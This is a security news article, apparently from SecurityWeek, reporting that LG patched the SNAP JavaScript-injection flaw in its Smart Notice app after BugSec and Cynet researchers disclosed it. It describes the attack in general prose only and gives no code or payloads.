LG today released a security update for some of its latest smartphones to resolve a severe vulnerability found in the Smart Notice application.
Introduced by LG in 2014, along with the flagship LG G3, the Smart Notice application comes pre-loaded on all new LG smartphones, and was designed to display notifications to users. BugSec security researchers Liran Segal and Shachar Korot discovered that the notifications displayed by Smart Notice can be modified to inject unauthenticated arbitrary JavaScript code on the affected devices.
Called SNAP, the vulnerability can result in the theft of sensitive user data, a team of BugSec and Cynet researchers determined. Furthermore, with Smart Notice loaded on all new LG handsets, they suggest that the flaw potentially affects millions of users globally.
By exploiting the vulnerability, attackers can extract private user information from the device, such as what’s stored on the SD card, including WhatsApp data and private images. Moreover, successful exploitation renders users vulnerable to phishing attacks and can result in the installation of mobile malware the affected devices.
Smart Notice was designed to present users with a series of notifications in the form of cards, to suggest they keep in touch with favorite contacts, to suggest saving a caller number, or to remind users about contact birthdays or to callback a contact after declining the call.
The issue is that the Smart Notice application does not validate the data presented to users, which means that data can be taken from the phone contacts and manipulated. The team of researchers also discovered that functionality issues in the application make it possible to launch attacks using different methods.
The security researchers managed to insert a new “malicious” contact that had a script embedded to the contacts list and have it triggered by the “Callback Reminder” and “Birthday notification.” Smart Notice uses a “WebView”-based application and researchers said they were able to run code from the “WebView” context to the phone.
By loading external scripts from a remote host and refreshing the code every few seconds, researchers gained control over the LG phone and were able to send additional payloads. The flaw allowed the researchers to access a phone’s external SD Card, auto open the browser to a remote site (for phishing and/or drive-by downloads), and even launch a denial of service (DoS) attack.
The researchers also found that attackers could use several vectors to compromise a device by injecting the malicious contact without the phone user noticing it.
The researchers have contacted LG to report the vulnerability and the company was quick to acknowledge the issue and deliver a patch. Owners of LG devices that have the Smart Notice loaded on them are advised to update to the latest version of the application as soon as possible to stay protected.
Vulnerabilities in mobile devices are nothing out of the ordinary, especially when it comes to Android, as Google patches flaws in the OS on a monthly basis.
More from SecurityWeek News
- Threat Hunting Summit Virtual Event NOW LIVE
- Video: ESG – CISO’s Guide to an Emerging Risk Cornerstone
- Threat Modeling Firm IriusRisk Raises $29 Million
- SentinelOne Announces $100 Million Venture Fund
- Today: 2022 CISO Forum Virtual Event
- Cymulate Closes $70M Series D Funding Round
- SecurityWeek to Host CISO Forum Virtually September 13-14, 2022: Registration is Open
- Privilege Escalation Flaw Haunts VMware Tools
Latest News
- Comcast Wants a Slice of the Enterprise Cybersecurity Business
- Critical Baicells Device Vulnerability Can Expose Telecoms Networks to Snooping
- New York Attorney General Fines Vendor for Illegally Promoting Spyware
- SecurityWeek Analysis: Over 450 Cybersecurity M&A Deals Announced in 2022
- 20 Million Users Impacted by Data Breach at Instant Checkmate, TruthFinder
- Cyber Insights 2023 | Zero Trust and Identity and Access Management
- Cyber Insights 2023 | The Coming of Web3
- European Police Arrest 42 After Cracking Covert App
